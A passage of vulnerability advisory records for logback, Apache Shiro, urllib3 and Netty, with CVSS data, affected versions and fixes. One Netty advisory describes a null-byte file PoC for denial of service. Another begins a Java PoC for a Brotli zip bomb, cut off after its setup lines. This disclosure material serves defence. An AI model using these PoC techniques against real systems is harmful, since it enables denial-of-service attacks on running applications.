  "dataVersion": "5.1"
}

CVE-2026-1225 (GCVE-0-2026-1225)

Vulnerability from cvelistv5 – Published: 2026-01-22 09:24 – Updated: 2026-01-22 14:14

Title

Malicious logback.xml configuration file allows instantiation of arbitrary classes

Summary

ACE vulnerability in configuration file processing by QOS.CH logback-core up to and including version 1.5.24 in Java applications, allows an attacker to instantiate classes already present on the class path by compromising an existing logback configuration file. The instantiation of a potentially malicious Java class requires that said class is present on the user's class-path. In addition, the attacker must have write access to a configuration file. However, after successful instantiation, the instance is very likely to be discarded with no further ado.

Severity ?

1.8 (Low)


                        
                          CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/S:N/AU:N/RE:M/U:Green

CWE

CWE-20 - Improper Input Validation

Assigner

NCSC.ch

References

1 reference

URL	Tags
https://logback.qos.ch/news.html#1.5.25

Impacted products

1 product

Vendor	Product	Version
QOS.CH Sarl	Logback-core	Affected: 0.9.20 , ≤ 1.5.24 (maven) Unaffected: 1.5.25

Credits

https://www.code-intelligence.com/ Google Fuzz

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-1225",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-22T14:14:09.436515Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-22T14:14:17.842Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unknown",
          "modules": [
            "logback-core",
            "logback-classic"
          ],
          "platforms": [
            "Java"
          ],
          "product": "Logback-core",
          "vendor": "QOS.CH Sarl",
          "versions": [
            {
              "lessThanOrEqual": "1.5.24",
              "status": "affected",
              "version": "0.9.20",
              "versionType": "maven"
            },
            {
              "status": "unaffected",
              "version": "1.5.25"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "https://www.code-intelligence.com/"
        },
        {
          "lang": "en",
          "type": "finder",
          "value": "Google Fuzz"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cdiv\u003eACE vulnerability in configuration file processing  by QOS.CH logback-core up to and including version 1.5.24 in Java applications, allows an attacker to instantiate classes already present on the class path by compromising an existing logback configuration file.\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThe instantiation of a potentially malicious Java class requires that said class is present on the user\u0027s class-path. In addition, the attacker must  have write access to a \nconfiguration file. However, after successful instantiation, the instance is very likely to be discarded with no further ado.\u003c/div\u003e"
            }
          ],
          "value": "ACE vulnerability in configuration file processing  by QOS.CH logback-core up to and including version 1.5.24 in Java applications, allows an attacker to instantiate classes already present on the class path by compromising an existing logback configuration file.\n\n\n\n\nThe instantiation of a potentially malicious Java class requires that said class is present on the user\u0027s class-path. In addition, the attacker must  have write access to a \nconfiguration file. However, after successful instantiation, the instance is very likely to be discarded with no further ado."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "No known exploitation\u003cbr\u003e"
            }
          ],
          "value": "No known exploitation"
        }
      ],
      "impacts": [
        {
          "descriptions": [
            {
              "lang": "en",
              "value": "Arbitrary code execution on previously compromised system"
            }
          ]
        },
        {
          "capecId": "CAPEC-242",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-242 Code Injection"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NO",
            "Recovery": "NOT_DEFINED",
            "Safety": "NEGLIGIBLE",
            "attackComplexity": "HIGH",
            "attackRequirements": "PRESENT",
            "attackVector": "LOCAL",
            "baseScore": 1.8,
            "baseSeverity": "LOW",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "HIGH",
            "providerUrgency": "GREEN",
            "subAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "LOW",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/S:N/AU:N/RE:M/U:Green",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW",
            "vulnerabilityResponseEffort": "MODERATE"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20 Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-22T12:10:39.562Z",
        "orgId": "455daabc-a392-441d-aa46-37d35189897c",
        "shortName": "NCSC.ch"
      },
      "references": [
        {
          "url": "https://logback.qos.ch/news.html#1.5.25"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Update to logback version 1.5.25 or later. \u003cbr\u003e"
            }
          ],
          "value": "Update to logback version 1.5.25 or later."
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Malicious logback.xml configuration file allows instantiation of arbitrary classes",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "455daabc-a392-441d-aa46-37d35189897c",
    "assignerShortName": "NCSC.ch",
    "cveId": "CVE-2026-1225",
    "datePublished": "2026-01-22T09:24:14.634Z",
    "dateReserved": "2026-01-20T12:29:25.357Z",
    "dateUpdated": "2026-01-22T14:14:17.842Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-23901 (GCVE-0-2026-23901)

Vulnerability from cvelistv5 – Published: 2026-02-10 09:25 – Updated: 2026-02-10 15:31

Title

Apache Shiro: Brute force attack possible to determine valid user names

Summary

Observable Timing Discrepancy vulnerability in Apache Shiro. This issue affects Apache Shiro: from 1.*, 2.* before 2.0.7. Users are recommended to upgrade to version 2.0.7 or later, which fixes the issue. Prior to Shiro 2.0.7, code paths for non-existent vs. existing users are different enough, that a brute-force attack may be able to tell, by timing the requests only, determine if the request failed because of a non-existent user vs. wrong password. The most likely attack vector is a local attack only. Shiro security model https://shiro.apache.org/security-model.html#username_enumeration discusses this as well. Typically, brute force attack can be mitigated at the infrastructure level.

Severity ?

1 (Low)


                        
                          CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/S:N/AU:Y/R:A/V:C/RE:L/U:Green

CWE

CWE-208 - Observable Timing Discrepancy

Assigner

apache

References

1 reference

URL	Tags
https://lists.apache.org/thread/mm1jct9b86jvnh3y4…	vendor-advisory

Impacted products

1 product

Vendor	Product	Version
Apache Software Foundation	Apache Shiro	Affected: 0 , < 2.0.7 (semver)

Credits

4ra1n Y4tacker lprimak

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2026-02-10T10:22:44.721Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "http://www.openwall.com/lists/oss-security/2026/02/08/2"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-23901",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-10T15:31:09.515973Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-10T15:31:25.166Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://repo.maven.apache.org/maven2",
          "defaultStatus": "unaffected",
          "packageName": "org.apache.shiro:shiro-core",
          "product": "Apache Shiro",
          "vendor": "Apache Software Foundation",
          "versions": [
            {
              "lessThan": "2.0.7",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "4ra1n"
        },
        {
          "lang": "en",
          "type": "finder",
          "value": "Y4tacker"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "lprimak"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eObservable Timing Discrepancy vulnerability in Apache Shiro.\u003c/p\u003e\u003cp\u003eThis issue affects Apache Shiro: from 1.*, 2.* before 2.0.7.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.0.7 or later, which fixes the issue.\u003c/p\u003ePrior to Shiro 2.0.7, code paths for non-existent vs. existing users are different enough,\u003cbr\u003ethat a brute-force attack may be able to tell, by timing the requests only, determine if\u003cbr\u003ethe request failed because of a non-existent user vs. wrong password.\u003cbr\u003e\u003cbr\u003eThe most likely attack vector is a local attack only.\u003cbr\u003eShiro security model\u0026nbsp;\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://shiro.apache.org/security-model.html#username_enumeration\"\u003ehttps://shiro.apache.org/security-model.html#username_enumeration\u003c/a\u003e\u0026nbsp;discusses this as well.\u003cbr\u003e\u003cbr\u003eTypically, brute force attack can be mitigated at the infrastructure level."
            }
          ],
          "value": "Observable Timing Discrepancy vulnerability in Apache Shiro.\n\nThis issue affects Apache Shiro: from 1.*, 2.* before 2.0.7.\n\nUsers are recommended to upgrade to version 2.0.7 or later, which fixes the issue.\n\nPrior to Shiro 2.0.7, code paths for non-existent vs. existing users are different enough,\nthat a brute-force attack may be able to tell, by timing the requests only, determine if\nthe request failed because of a non-existent user vs. wrong password.\n\nThe most likely attack vector is a local attack only.\nShiro security model\u00a0 https://shiro.apache.org/security-model.html#username_enumeration \u00a0discusses this as well.\n\nTypically, brute force attack can be mitigated at the infrastructure level."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "YES",
            "Recovery": "AUTOMATIC",
            "Safety": "NEGLIGIBLE",
            "attackComplexity": "HIGH",
            "attackRequirements": "PRESENT",
            "attackVector": "LOCAL",
            "baseScore": 1,
            "baseSeverity": "LOW",
            "privilegesRequired": "LOW",
            "providerUrgency": "GREEN",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "LOW",
            "subIntegrityImpact": "NONE",
            "userInteraction": "ACTIVE",
            "valueDensity": "CONCENTRATED",
            "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/S:N/AU:Y/R:A/V:C/RE:L/U:Green",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "LOW"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        },
        {
          "other": {
            "content": {
              "text": "low"
            },
            "type": "Textual description of severity"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-208",
              "description": "CWE-208 Observable Timing Discrepancy",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-10T09:25:51.765Z",
        "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "shortName": "apache"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.apache.org/thread/mm1jct9b86jvnh3y44tj22xvjtx3xhhh"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "Apache Shiro: Brute force attack possible to determine valid user names",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
    "assignerShortName": "apache",
    "cveId": "CVE-2026-23901",
    "datePublished": "2026-02-10T09:25:51.765Z",
    "dateReserved": "2026-01-17T18:01:53.140Z",
    "dateUpdated": "2026-02-10T15:31:25.166Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-44431 (GCVE-0-2026-44431)

Vulnerability from cvelistv5 – Published: 2026-05-13 15:20 – Updated: 2026-05-13 17:17

Title

urllib3: Sensitive headers forwarded across origins in proxied low-level redirects

Summary

urllib3 is an HTTP client library for Python. From 1.23 to before 2.7.0, cross-origin redirects followed from the low-level API via ProxyManager.connection_from_url().urlopen(..., assert_same_host=False) still forward these sensitive headers. This vulnerability is fixed in 2.7.0.

Severity ?

8.2 (High)


                        
                          CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE

CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/urllib3/urllib3/security/advis…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
urllib3	urllib3	Affected: >= 1.23, < 2.7.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44431",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-13T16:51:26.677054Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-13T17:17:07.339Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "urllib3",
          "vendor": "urllib3",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.23, \u003c 2.7.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "urllib3 is an HTTP client library for Python. From 1.23 to before 2.7.0, cross-origin redirects followed from the low-level API via ProxyManager.connection_from_url().urlopen(..., assert_same_host=False) still forward these sensitive headers. This vulnerability is fixed in 2.7.0."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "HIGH",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-200",
              "description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-13T15:20:24.588Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
        }
      ],
      "source": {
        "advisory": "GHSA-qccp-gfcp-xxvc",
        "discovery": "UNKNOWN"
      },
      "title": "urllib3: Sensitive headers forwarded across origins in proxied low-level redirects"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44431",
    "datePublished": "2026-05-13T15:20:24.588Z",
    "dateReserved": "2026-05-06T14:40:00.954Z",
    "dateUpdated": "2026-05-13T17:17:07.339Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-44432 (GCVE-0-2026-44432)

Vulnerability from cvelistv5 – Published: 2026-05-13 15:17 – Updated: 2026-05-15 18:25

Title

urllib3: Decompression-bomb safeguards bypassed in parts of the streaming API

Summary

urllib3 is an HTTP client library for Python. From 2.6.0 to before 2.7.0, urllib3 could decompress the whole response instead of the requested portion (1) during the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library or (2) when HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here). These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data) on the client side. This vulnerability is fixed in 2.7.0.

Severity ?

8.9 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

CWE

CWE-409 - Improper Handling of Highly Compressed Data (Data Amplification)

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/urllib3/urllib3/security/advis…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
urllib3	urllib3	Affected: >= 2.6.0, < 2.7.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44432",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-15T18:17:39.119999Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-15T18:25:06.331Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "urllib3",
          "vendor": "urllib3",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 2.6.0, \u003c 2.7.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "urllib3 is an HTTP client library for Python. From 2.6.0 to before 2.7.0, urllib3 could decompress the whole response instead of the requested portion (1) during the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library or (2) when HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here). These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data) on the client side. This vulnerability is fixed in 2.7.0."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 8.9,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-409",
              "description": "CWE-409: Improper Handling of Highly Compressed Data (Data Amplification)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-13T15:17:12.611Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
        }
      ],
      "source": {
        "advisory": "GHSA-mf9v-mfxr-j63j",
        "discovery": "UNKNOWN"
      },
      "title": "urllib3: Decompression-bomb safeguards bypassed in parts of the streaming API"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44432",
    "datePublished": "2026-05-13T15:17:12.611Z",
    "dateReserved": "2026-05-06T14:40:00.954Z",
    "dateUpdated": "2026-05-15T18:25:06.331Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

GHSA-25QH-J22F-PWP8

Vulnerability from github – Published: 2025-10-01 09:30 – Updated: 2025-10-31 20:17

Summary

QOS.CH logback-core is vulnerable to Arbitrary Code Execution through file processing

Details

QOS.CH logback-core versions up to 1.5.18 contain an ACE vulnerability in conditional configuration file processing in Java applications. This vulnerability allows an attacker to execute arbitrary code by compromising an existing logback configuration file or by injecting a malicious environment variable before program execution.

A successful attack requires the Janino library and Spring Framework to be present on the user's class path. Additionally, the attacker must have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privileges.

Severity ?

5.9 (Medium)


                  
                    CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ch.qos.logback:logback-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.4.0"
            },
            {
              "fixed": "1.5.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ch.qos.logback:logback-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-11226"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-21T21:10:11Z",
    "nvd_published_at": "2025-10-01T08:15:31Z",
    "severity": "MODERATE"
  },
  "details": "QOS.CH logback-core versions up to 1.5.18 contain an ACE vulnerability in conditional configuration file processing in Java applications. This vulnerability allows an attacker to execute arbitrary code by compromising an existing logback configuration file or by injecting a malicious environment variable before program execution.\n\nA successful attack requires the Janino library and Spring Framework to be present on the user\u0027s class path. Additionally, the attacker must have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privileges.",
  "id": "GHSA-25qh-j22f-pwp8",
  "modified": "2025-10-31T20:17:45Z",
  "published": "2025-10-01T09:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11226"
    },
    {
      "type": "WEB",
      "url": "https://github.com/qos-ch/logback/issues/974"
    },
    {
      "type": "WEB",
      "url": "https://github.com/qos-ch/logback/commit/61f6a2544f36b3016e0efd434ee21f19269f1df7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/qos-ch/logback"
    },
    {
      "type": "WEB",
      "url": "https://github.com/qos-ch/logback/releases/tag/v_1.5.19"
    },
    {
      "type": "WEB",
      "url": "https://logback.qos.ch/news.html#1.3.16"
    },
    {
      "type": "WEB",
      "url": "https://logback.qos.ch/news.html#1.5.19"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "QOS.CH logback-core is vulnerable to Arbitrary Code Execution through file processing"
}

GHSA-389X-839F-4RHX

Vulnerability from github – Published: 2025-02-10 18:14 – Updated: 2025-03-19 14:51

Summary

Denial of Service attack on windows app using Netty

Details

Summary

An unsafe reading of environment file could potentially cause a denial of service in Netty. When loaded on an Windows application, Netty attemps to load a file that does not exist. If an attacker creates such a large file, the Netty application crash.

Details

A similar issue was previously reported in https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv This issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit.

PoC

The PoC is the same as for https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv with the detail that the file should only contain null-bytes; 0x00. When the null-bytes are encountered by the InputStreamReader, it will issue replacement characters in its charset decoding, which will fill up the line-buffer in the BufferedReader.readLine(), because the replacement character is not a line-break character.

Impact

Impact is the same as https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv

Severity ?

5.5 (Medium)


                  
                    CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.netty:netty-common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.118.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-25193"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-10T18:14:47Z",
    "nvd_published_at": "2025-02-10T22:15:38Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nAn unsafe reading of environment file could potentially cause a denial of service in Netty.\nWhen loaded on an Windows application, Netty attemps to load a file that does not exist. If an attacker creates such a large file, the Netty application crash.\n\n### Details\nA similar issue was previously reported in https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv\nThis issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit.\n\n\n### PoC\nThe PoC is the same as for https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv with the detail that the file should only contain null-bytes; 0x00.\nWhen the null-bytes are encountered by the `InputStreamReader`, it will issue replacement characters in its charset decoding, which will fill up the line-buffer in the `BufferedReader.readLine()`, because the replacement character is not a line-break character.\n\n### Impact\nImpact is the same as https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv",
  "id": "GHSA-389x-839f-4rhx",
  "modified": "2025-03-19T14:51:27Z",
  "published": "2025-02-10T18:14:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/security/advisories/GHSA-389x-839f-4rhx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25193"
    },
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/commit/d1fbda62d3a47835d3fb35db8bd42ecc205a5386"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/netty/netty"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20250221-0006"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Denial of Service attack on windows app using Netty"
}

GHSA-3P8M-J85Q-PGMJ

Vulnerability from github – Published: 2025-09-03 18:00 – Updated: 2025-09-04 13:51

Summary

Netty's decoders vulnerable to DoS via zip bomb style attack

Details

Summary

With specially crafted input, BrotliDecoder and some other decompressing decoders will allocate a large number of reachable byte buffers, which can lead to denial of service.

Details

BrotliDecoder.decompress has no limit in how often it calls pull, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is basically a zip bomb.

Tested on 4.1.118, but there were no changes to the decoder since.

PoC

Run this test case with -Xmx1G:

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
